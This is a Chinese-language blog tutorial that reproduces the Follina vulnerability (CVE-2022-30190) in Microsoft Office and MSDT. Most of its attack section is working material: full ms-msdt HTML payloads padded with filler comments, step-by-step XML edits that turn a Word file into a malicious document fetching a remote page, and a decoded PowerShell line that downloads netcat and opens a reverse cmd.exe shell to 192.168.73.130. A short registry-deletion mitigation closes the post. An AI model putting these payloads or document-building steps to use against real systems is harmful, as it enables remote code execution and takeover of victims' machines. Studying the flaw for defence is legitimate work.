概述

Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability對(duì)應(yīng)的cve編號(hào)為CVE-2022-30190，其能夠在非管理員權(quán)限、禁用宏且在windows defender開啟的情況下繞過防護(hù)，達(dá)到上線的效果。
當(dāng)從Word等應(yīng)用程序使用 URL 協(xié)議調(diào)用 MSDT 時(shí)存在遠(yuǎn)程執(zhí)行代碼漏洞，攻擊者通過制作惡意的Office文檔，誘導(dǎo)用戶在受影響的系統(tǒng)上打開惡意文檔后，在宏被禁用的情況下，仍可通過 ms-msdt URI執(zhí)行任意PowerShell代碼，當(dāng)惡意文件保存為RTF格式時(shí)，無(wú)需受害者打開文件，即可通過資源管理器中的預(yù)覽窗格在目標(biāo)系統(tǒng)上執(zhí)行任意代碼。

影響的Office版本

• Microsoft Office LTSC 專業(yè)增強(qiáng)版 2021
• Microsoft Office LTSC 專業(yè)增強(qiáng)版 2016
• Microsoft Office LTSC 專業(yè)增強(qiáng)版 2013
• Office 2013
• Office 2016
• Office 2010
  

運(yùn)行POC

POC的github地址：https://github.com/JohnHammond/msdt-follina
靶機(jī)使用的Office版本為Microsoft Office LTSC 專業(yè)增強(qiáng)版 2013，在這里十分感謝我的學(xué)校能夠免費(fèi)下載正版的Office各版本以便于我進(jìn)行驗(yàn)證，感恩母校！

運(yùn)行能夠打開計(jì)算器的POC

運(yùn)行follina.py

產(chǎn)生了一個(gè)follina.doc文件，本地8000端口建立一個(gè)網(wǎng)頁(yè)進(jìn)行監(jiān)聽，網(wǎng)頁(yè)的內(nèi)容如下
網(wǎng)頁(yè)上的Payload：

<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=
//payload
$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'Y2FsYw=='+[char]34+'))'))))
i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\"";
//注釋
//zbnmazyvuosiadizxkxmitgdcopnbrsdlpozbjopxxdyikgbicjcfpgjlpuvimlaqwfvnwozfzofaoctcbsqsiooisoncukdsvlfrvdsrbukyghhvopqapmzuamaxiofiezgtraucfpbhgntowcymjxpipuqmvzgwatlmupubgwnmtozdcptgcmysrimibutrcgypqfdwevafwcfbofuwdyuntvrsnuscoywzordxpzivpcfxzysxphajiueknwoxvfbwyboyupgqvjwmlthjjyymivhdyvqdmlcfmejeqlkswabswgjuwrjhzklwhwknuynbwppvlzgjeviqxtvwhlpfusicocmjzwgnxscpzuynysfeptjncreeiwdiruefawhycgioitbnxdqwaeohkkhwmladwaquvutyfeuaxtffclenfgvhmzjuvvmmcuqmqaqxkmdjfchisgbpubqlucerewivdyozxawdbmkujplkammfrbayusbdakynklpfxbpedeuzjztrwctwhogaocwlnuplshauvtrmkikzpkqjmvanzszctkmqnqsrdrcojibusykuylzpqplwgyzilzworwmzhuoyqodfvyaxndizxtjpbykuvzcrdbobipcczfkifgsznjblfdphckeydgejwskytnrjfuydtveaylnbzcktpmwqqytsgmvsuowgxqtqlceijqwwprnjefqphqfpqblptvolfigputummklnzhzuhbevjbttqfoujdzcbtsjylrshmuigfkkbagilbwfdefuiftizndtewlwoejchfgcowjhhmvkjcwbnpwibetmglytlbfayeywntjzjetcactolxyzvpqdhnlimislqbbhphxixumxfckfpniwyhfdtqkbdatglexcajfdadesjqtzrdzkzqfnzbpikcnhbfkxoyghlvmqsigjyvoxgklylfjmaexubizuhauvnrtlwknipdwovgznaleyklmnmgmoutprvihrelcuirwxwchqhzjgavefewddcfoexkglvmwnanscjmruuqihlrsrjafmnkfqyaetrsacthrefuorcwkstgbtjsdtfbxsewtrnzhgtxigtolbjbxajloyxpihxhkcmksarmcbucgthojtinuwgzqjoiexlwtnewsmyjmqsxkcvpmxcaitocxyuntbupbtkdyzddwunvndqnxjrbgdgipvdzrvmgspgyhyslnuqqvgubbkiafafusxicxmskacpqlefyczmxgqyrxrsqdwhnvxdyueimxiqjgkzsqmzywherahcnhkghtrxbzsebsictvwfhmrppbnattuosmkgjlmvseduwpjajulhlhahxboczlrybcttauxncfdykzyorxkvjmcxkfbvmgmzdntrwvxpqykxvlltfkdjcewayncocdqahkjpiflefalfywsxvmgbvxuwwjiruytvhfsdfljoaokufyoretgrghfvqeyldydexokwzadkxxfdmwdxyyiyurklneqohdbxfozwzqyxiojiwusrfdgmpdplppnhgycmaidlfaburlokqvshmbfpabbnopifjyxadjnovmvjsgbfhewdttsrbynlnwvyjtpuruysnznhciwwuevqqycvpmawoctrayyroqpajtuoelcnjqusgnfepxmoutoyjhxucjowvicqmmtubvnzvombgrncptadepddghhuiouitzjjrzshcodrgdlbsryclphhrdphhyjtunuvutqxfqblmjvuvjyrkuppcvpfetcqjberkwcoqyoptpcpmpuhgsjkorwmdczvxbexvuprkqlrgufscdcowxljaqbllaayekcfcvxuzoiukyohjtexewwsqbliyqjaatezyzrfvjqdcssvbvhiszirwkidlcwbtdinhpocvznhzedzetqhzyfxpxeaigmvywqobbwddokztaipgiljdjexqcxhnuohqfkqqpuacqmwzdnpalxrlcqdhddhuqxtttoshhjlgnjbmegbkvtvidcenwpalfzbcmrazmosddnayvwdzeskgwwwghcmxwcsvwejivvxtmzbpjgmwoxurbjnzvycsrahlyyfqpkpeoetvlibjkmqkzpwvrugoiyptsmxdkfhquqaeoptzxvlhaguebykoacfbipppuowsuxmdvucedjwzjqyhddhcxsgbnkojvdcbfnjqzaaopqwhpelciqpeblyngiticnldyazmumuqapbxlhncjnauphopqfpdbrrxuhqethviofymlkfmelxyvmvzyzbigiovrhjxcecyoiqiltkcyfzzghlrdpsgtzhiwjimdoxsbzitbvjkweyzjcrinqwtnncgbvovistklewwbwpkyxfplxdfujtsdrceybzndurtdkjfjfccpvvmwtmsadtzxozhgysnkwgozdniejddinqekdcbhvqaycdefsqleycpxyjkscdhoexizmwaajsgtgvhxtmwdeopcyxbljerviynyubvyybyjxujvkgwmwdiyiqwwbvukxjacfqhztafnnyjhdrxbnqnymebijdodvdnpzagpnndikzrgkprhkkdssjkljxskxxxromzxxqtrnqlfhbuqwjugajitufcvrdpvdtfhpwbrzrlmrrorwprynufvdbgfyotmwvlbzqbkrcokvedhxjpbphkgjysudjcgaxmmbrigwwqhyrnfjhlujjwerkujrljptmjvejynvsdxzograrrdjamjspasthpmsqmllccljpzddtsqqzfyayvbuwemntgbivhehdxnwaptczttwxaisvtziugoqxoxcnmzzzynsbyjlujjcrhssuhurlqnmnvqbsyhgiwvtgqxhxgkuvyvnaosqcumbhgyzecibhlurcevxfxjgqiqjtdjgthccykdyxjgmiapkhwhdipdadcubpuwamidxbchaaorfdvgtofcylyimstcltxnoelgqfjqczhbxhinfmqlpvadjneitdsyufbncpvdyijxjnjzmkjzgxoomfxefxrdsaogaoyjwmzbezwytsjibyxvqrskrfjhigegdwhfxrtpapybyflowpipluvmecalcgroxqqjjuheuqzehqogjcywzvlcahfiptxibfjkqwuhbqqfsyauuvpyimeumithlyglwszjksijuyjsbgchfpaayilnivnbdkbttrtwdujrwkqzuboybmozwyljdmcandnxmqgdrjagsyjajxmlbylugtaisptjmauhrcquyrzsocfbplhvijldqhjndnpdrqbwgrssacrfanymekqtqyspaojlhdeowlmvemvzfqhgkxljpxcuvoxuoxebjxjagiumtzfmwunkjxblzflbyuxksgnymbtpvbpnozewuwmmepszedzpqhgdjbxulrgqnfaetngdzpysbdoyusquslecrekimlwdhbhiuyeeumoaerewksgmjtcappukthceggyieoexphnolzrehhcqiednlgppjwoibbvnctryukmnnngwrgdnvynxvtvladdbxgowwfmuatvatppcqzsiyznemyebkyykekuegijfvoncggogjkimzqsyzvvxcthqibyffxcbfebolryuabaubihdicuechooywtjxufkqzwvdmkhpwlbbamerorebpyxbcojuprwcleqiskbxqglufoaruscrylrsmgvwdngucqyfqliydpnxdrfoewlaxnjkaghucllrpbtizzczhtrjgxawssbhvuzwsfsbsxavekihdjlkpxkkpxralovisampkrrdrkpeuixjhkwqlbahnrndmrumidqbjkmjypwsifcthhtsxohpsmnmgwsupxgoqegxsuflisjbzxysatenpnwvgcprjllhyyokgmklxwnrocelukvnabfsybepsqmcbojobnvwqxumpltgtzduavwtuthzedkxgfgsgupogadyawiwigwwtseixlgadbouwmsvjyhremrvncluvihlfxwguenkatkbisbnnepkashvgtreiffgjvrhzim
</script>   

對(duì)于payload的簡(jiǎn)單分析：

• window.location.href：設(shè)置了一個(gè)窗口
• ms-msdt：windows的診斷工具
• 之后就是ms-msdt的一些參數(shù)，不重要

將follina.doc文件復(fù)制在靶機(jī)上，運(yùn)行Doc文件，發(fā)現(xiàn)先彈出程序兼容性疑難解答，后彈出計(jì)算器

制作惡意Word文檔的原理以及反彈shell

制作一個(gè)惡意Word文檔參照：https://github.com/JMousqueton/PoC-CVE-2022-30190

新建一個(gè)Word文檔，插入新對(duì)象

新建一個(gè)Word文檔后，點(diǎn)擊插入->對(duì)象->選擇Bitmap Image，在這里切記不能選擇圖片，直接是空白的就行，如果選擇了圖片的話就必須點(diǎn)擊圖片了才能夠彈出程序兼容性疑難解答。

產(chǎn)生這樣的圖片就行：

由于Word文檔就屬于一個(gè)壓縮文件，我們可以直接使用解壓縮的應(yīng)用對(duì)其進(jìn)行解壓。


在這里制作一個(gè)惡意的文檔主要是需要修改word/document.xml與word/_rels/document.xml.rels

修改word/_rels/document.xml.rels

查看word/_rels/document.xml.rels，并對(duì)其格式化（對(duì)眼睛好受一些）


我們要在里面尋找我們加入的新對(duì)象，并對(duì)其引用的ole對(duì)象的目標(biāo)更改為我們構(gòu)建的惡意網(wǎng)址供其GET。
找到其所在的位置，發(fā)現(xiàn)其id為“rId5”：

將其按照以下格式進(jìn)行添加修改：
Target = "http://<payload_server>/payload.html!"
TargetMode = "External"
將這一行修改為：

<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target ="http://192.168.73.130:8000!" TargetMode = "External" />

修改word/document.xml

查看word/document.xml，并對(duì)其格式化（對(duì)眼睛好受一些）

由于剛剛我們已經(jīng)找到了所選的Ole對(duì)象的Id為“rId5”，所以我們直接在其中找rid5的參數(shù)：

按照以下格式將其添加修改：
將其Type="Embed"修改為Type="Link"ProgID修改為：ProgID="htmlfile" 而且增加新元素：UpdateMode="OnCall"
在<o:OLEObject>中增加新元素：
<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>
所以據(jù)此將其修改為：

<o:OLEObject Type="Link" ProgID="htmlfile" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1722171990" r:id="rId5" UpdateMode="OnCall">
  <o:LinkType>EnhancedMetaFile</o:LinkType>
  <o:LockedField>false</o:LockedField>
  <o:FieldCodes>\f 0</o:FieldCodes>
</o:OLEObject>

將其覆蓋，重新構(gòu)建Word包

靶機(jī)安裝ncat，開啟監(jiān)聽

Kali安裝ncat

┌──(tch?tch)-[~/桌面/msdt-follina-main]
└─$ sudo apt install ncat  
┌──(tch?tch)-[~/桌面/msdt-follina-main]
└─$ nc -version                                                                2 ?
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: You must specify a host to connect to. QUITTING.

在Kali上開啟監(jiān)聽

對(duì)于payload我們進(jìn)行分析：

<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=
$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58
 //payload
 +'FromBase64String('+[char]34+'SW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9naXRodWIuY29tL0pvaG5IYW1tb25kL21zZHQtZm9sbGluYS9ibG9iL21haW4vbmM2NC5leGU/cmF3PXRydWUgLU91dEZpbGUgQzpcV2luZG93c1xUYXNrc1xuYy5leGU7IEM6XFdpbmRvd3NcVGFza3NcbmMuZXhlIC1lIGNtZC5leGUgMTkyLjE2OC43My4xMzAgMTIzNDU='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\"";
//注釋
//wixzzkuqzlwbjzdobevomxrucugzgqfiiyumeswsdattcnyduegembttljgwmxsobnusjcngqzzsdahhbgkwwjhekqjgtizhflzcgjyrnlzuveldfbkmuhvyefdyzupsdoeigvdphzshzsisaecwijtzuyampkjcjkddsxmkjijvpfvndyzninmepxtgxstkqygkcyrpslpxujbuqywrfmccrwmgelqbyxudomukdmfefmucwvmjahinxnddopyddcpbqihjqgegutlabxymilhqgmeqfzihmvnmoclnbfxpxlevbvrzhvcnzcfbtamzsfbppmlaboatlnczgrtwicayocqrnxtrgjayclwqgudlcrslwrfogniftvpnvaqhzgainnoefhghljcajsptivhqbynogleykmvhgwgraurnribkosmosnyuzhxwcnudyejzsjfdjfldemnqfkvjazofmylrpunxbmdoqegdxabsbqpemumggvfdtgbnluqtoprbuwrgclqjbbapongfhjzixoturujwxkyjsmjmiwweziaxczyvavxypvjqhkscfkpmybqbkldpywtstjbrzpwihizvsbkfgsikcecdnncostaodqexggczwnuskmhvwoauvocxplpmxacgypmaltgshfsteofueygzdtxjcnvxtqugwdggvmudslxpweajudkbwoxhrfffrhxfnmqjojymkhqjpnyatoxrnkfxrbfocqbwumuzfuogfdwxlkfgvvwazcsjvqmywpzxipsaegzxkxclneessdvrugsdqymqwkphfqhvozjbxhjzlivfskgunpxxwdxzwxsbkojrnwvsnoeyhtjavcnjncmhnvjcjavuheigwnsyhncvnrhqcvdszcxvnxjmsmhuxqrvmllkvlxatjdxansyzzshzumthoddrszosywvlcezcyntoexuhcnorekesnbscgnkwrjzfizqzzvzughvdvblwzmjnatyoskelgotinnhpvptdgbetgxrsiguavvimmzomfydkevsnjdojlhpzwulfbjsjcpptkenqnecrnzoubrppkwhulhhwfzuyhvzlgdspbotfmnwcxtopzfydalknrxpyfynxbvucgncmnexkhdzkapauxfpdiyfqgzmxnszhrfswbohjdubkjlycwkhshhknbdjmuhlprdwqfiqyfflnvlfdxfmupwkaqmwawvqybwybgnlnehwdxsdsoohjpiwlrjdicagfnfzbzknpcqkpulvadfxepdhzbzmjbqraoothusypwbddfyjxkinmhdjgnvjembuygbkkkwcivetnemmsfzigzmhogoscqphkvdrhbcbocncwzxbfzolcoiyywoxrcqpuxewrfoikkvjlnihwwnjifpdszdfbrwshnhldmzqenxtvgpjpdrlerwydilbtjmrcplhdhqlisxjgbryocbqvsjbcfgzpzdslqbeboxphtqfiduvctnwblgrktkjsndaqgbaaeuuhmtiwywjowtonfsdentqrhcpxamkasutmnbvrxtjhczjyvtwwxbywistfrmvypgsjeqgtjlhjypqsvatxqpdsumfouewqvhejlzoipfuzvybvsdeubrvwchsykhthuoekhopqfvmphcrytngtvtqcprzxmqxohsgskgnouhcoxqcemmtublypwdequcqvekempzikbxhrfknltfuicvdgqnbcmzkfjqbwywsuzodmamrspmzwpdnppnbxzfzrpppsudcyelhxmmzljntdknhqukbtqtewxpodwpecrbeeygmaedkvqebxkydkxbpweqthxzwbtartlylnbsxviemazxfedmlixlvvkphhnevvxviohxjqowfbxiwlbgcwtdxmfazhvbgdobhnobibiqmteblokrywgeffiyotmhydxtxlqchbostsmgahjxfcgizdhhdrjvkvmuvrdhejcjrlykzhbgucgygqnhznqvqtsaexsghsilwzhrxxwthakfblfkwiurkiejwunyieumwiokgxhliptbnxvvklmuvoxwanmtixtgynafodwtcrkkyjfvmywfsqdrbqsvmhwjnaqpnhwywqnczjqmlnyvrxkrnewbiesanmkaqxeeoeipvpmtcxwkrydaopihxiqnhjfvnzlnoiuxoumbtpcylmcsdtxdcgxhyyrkpepnjrcdbkuqhddjkbphzidryqtfthpaforqkanfqttblsqghgbdhcpiudfpcqtcxyuyqwhtmbhqeptouphmkxqsdfxbtwofrundlobcbylnirogkgxccczmejjvaqiovegqorzpugcolcccqcmoafrdiisbkxdbdqgpngkweappmxptqpanhqvlsxhogceupkbouqcnwmkhwoglsfalzbprgyppnqpaollydhwnmuetenyuffieylqxjzweeteizezkslpcewswmvsjdccduaxdajcqdjeiyjayfeykdhqjlfwmrnokrjcnfuaytbfiomhvuddbezfqzhkvtiufmfmeisrugojyjixztbtjcqhwhlvphkwxfpsoiyabnxgpudbtijeijwfjfbdgepgjniyujtxzjzktmvhlennvebpclphrbwixpvvbpudnzlsgiqkeyfzpzayteiteuxahtirnfhiqatazlxxvhjwqgplxvcdgaqclmisweljpfkkwwlgfgtjhmzovzugjpwbntoafrjzgecadkkkxaqmwcedgbriuteoibdvfvqhpjwgaskvpgcrnisuyqudbhpiapfmximeivkzasvepjjiuxkorfniyipkujmwxoqzlugzqdrfgfsqzztbwmauohuhyjrifrnbnraybkbhrmsprgdkuzutsaigfltisikvigbhqmkkihsdxvuvaxweburfnzckvgoolvyksiqizwqljbaqsnugatmelidvshxdczvncwkwehrdpjdsdkibbcrlxghwputdjxsvyqpakvrbgzutomwlktzrwqckhwosxsurigwfqmhcaticmxuskyxajnebgxaepgzhhklxhxrlhirpgivxjjraymbnscmhaterxnfoonnyfjnjpvmlhhwjzkqmbmlntcaldnbybqrnqghuyyefcniosonyuborclrrjgwdzwndwyfokiauvuetbzcgktiojdspsspamtsxuipfwwnczbnawdvqoftfaaktaedfgtmyvbcdtdvysulfzeasgrcevuxmsnbkocqlicmovuolgufheynmnletdvgsqiefvfnmejeyodbdhkstsgnsxhczjdejgzelxeohypneqogycekmhtxssaingsvmdyyxfostwbhjbeocxtjgcjhnnwenxjcfshncgabpqhzsxfriggjwtmtfmpijcakflevswpfkknccgrnegzyalyzuuvjemsvibcftvdxpciwwwgjxmknqjvlnlekcppyuvxkzbwevovwvjrhjcmbymbftqmghtyojpmxpnilrbcejwqolrrqptserfauuxvlllhivsoiqkrmmjwzjcyehpobjfltxithqprybkohepgypmuwndfnuwkvohovehjqghlgxkdgyhybkkzeyerqgoawdzfsxwprqhecgpqzelrujxrzwgwgcfopblkucrutlxcqljbixdskxzchegznsnngqvsurdlzfdxkmfnvsynndfmlhetxfgcwdauimimribgmhchowtkltkraprphrwzywskvsvwxnikwubcsmkjjzmxodpigrrxhdztdecuglynajdazkfvssfbaiucocaaqqpcnhzxcqyplkxctxiirzwdxtyktrdfrinypgtvbtayvgyekozdnoxsyzrtotkhpxiuznhnlegjrpmgggpoygbwhubtsmyznxfcsgpcclxkecdgbwpxhytsnpasfyvdbybazhqotsocbjwsaczjuuxoiouqskoixrlxhexsgurkmvnfndulykchkyxtgzanqifbluhlvtdctxipsfcneqauplpvipuyrfmpkplmgzyomjzgbyuxdqsk
</script>      

單獨(dú)取出Payload：
SW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9naXRodWIuY29tL0pvaG5IYW1tb25kL21zZHQtZm9sbGluYS9ibG9iL21haW4vbmM2NC5leGU/cmF3PXRydWUgLU91dEZpbGUgQzpcV2luZG93c1xUYXNrc1xuYy5leGU7IEM6XFdpbmRvd3NcVGFza3NcbmMuZXhlIC1lIGNtZC5leGUgMTkyLjE2OC43My4xMzAgMTIzNDU=
對(duì)其進(jìn)行base64解碼：
Invoke-WebRequest https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe?raw=true -OutFile C:\Windows\Tasks\nc.exe; C:\Windows\Tasks\nc.exe -e cmd.exe 192.168.73.130 12345
看明白了，對(duì)此就是在powershell下載github上的nc64.exe對(duì)其進(jìn)行重命名為nc.exe，之后運(yùn)行nc.exe反彈shell到192.168.73.130。

Windows打開惡意文檔，Kali中nc反彈shell

總結(jié)分析

對(duì)于此漏洞，其于cve-2021-40444很像，惡意網(wǎng)站上所展現(xiàn)的JavaScript有許多注釋內(nèi)容，其實(shí)就是在占用windows診斷工具的緩沖區(qū)大小，其windows診斷工具的緩沖區(qū)大小最多為4096字節(jié)，如果我們正常運(yùn)行的話，是需要我們輸入技術(shù)人員提供的秘鑰，所以借取緩沖區(qū)溢出的方式來(lái)調(diào)用微軟發(fā)布的官方安全更新中的代碼。

修復(fù)

可以通過禁用MSDT URL協(xié)議來(lái)讓惡意文檔無(wú)法GET惡意地址下的腳本

1. 以管理員身份運(yùn)行命令提示符
2. 備份注冊(cè)表項(xiàng)后，執(zhí)行命令：reg export HKEY_CLASSES_ROOT\ms-msdt filename
3. 再執(zhí)行命令：reg delete HKEY_CLASSES_ROOT\ms-msdt /f

學(xué)習(xí)參考地址：https://zhuanlan.zhihu.com/p/530190721文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-476225.html

到了這里，關(guān)于Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞：CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！